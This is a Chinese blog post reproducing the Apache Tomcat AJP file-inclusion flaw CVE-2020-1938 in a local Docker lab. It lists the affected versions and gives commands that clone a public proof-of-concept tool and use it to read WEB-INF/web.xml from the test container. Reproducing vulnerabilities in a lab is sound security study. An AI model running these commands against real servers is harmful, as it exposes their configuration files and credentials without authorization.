Apache Tomcat文件包含漏洞复现(CVE-2020-1938)

其他 2020-10-17 08:24:05 阅读次数: 0

Apache Tomcat文件包含漏洞复现(CVE-2020-1938)

前言

影响

    Apache Tomcat = 6
    7 <= Apache Tomcat <7.0.100
    8 <= Apache Tomcat <8.5.51
    9 <= Apache Tomcat <9.0.31

编号

CNVD-2020-10487
CVE-2020-1938

环境搭建

启动docker

systemctl start docker

查找容器

docker search tomcat-8.5.32

下载容器

docker pull duonghuuphuc/tomcat-8.5.32

启动容器

docker run -d -p 8080:8080 -p 8009:8009 duonghuuphuc/tomcat-8.5.32

查看容器

docker ps

在这里插入图片描述
访问

http://127.0.0.1:8080/

在这里插入图片描述

漏洞复现

poc下载地址

https://github.com/hypn0s/AJPy

git clone https://github.com/hypn0s/AJPy.git
cd AJPy
python tomcat.py read_file --webapp=manager /WEB-INF/web.xml 127.0.0.1
python tomcat.py version 127.0.0.1

在这里插入图片描述

参考文章

https://github.com/hypn0s/AJPy
https://www.liuyixiang.com/post/109123.html

猜你喜欢

转载自blog.csdn.net/qq_43645782/article/details/107128309
今日推荐
《美国对全球网络空间安全与发展的威胁和破坏》报告发布
火速冲上 GitHub 热榜 —— 开源编程语言、框架哪有这么可爱?
北京人形机器人创新中心发布全球首个纯电驱拟人奔跑的全尺寸人形机器人“天工”
LFOSSA 源来如此公开课 | 掌握云原生未来:CNCF 认证全面攻略与备考秘籍
周排行
让自己的头脑极度开放
CentOS 6.5(x64) 和Redhat6.5操作系误删libc
高可用注册中心
【日记】12.28/【题解】AtCoder AGC041
XML(5)_XML 约束_DTD
Java集合Map(四)
树梅派安装桌面环境教程
pipenv 的 使用和安装
小程序白屏问题和内存研究
C语言简单选择排序
每日归档
更多
2024-05-02(0)
2024-05-01(4)
2024-04-30(1)
2024-04-29(40)
2024-04-28(0)
2024-04-27(56)
2024-04-26(39)
2024-04-25(22)
2024-04-24(36)
2024-04-23(26)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022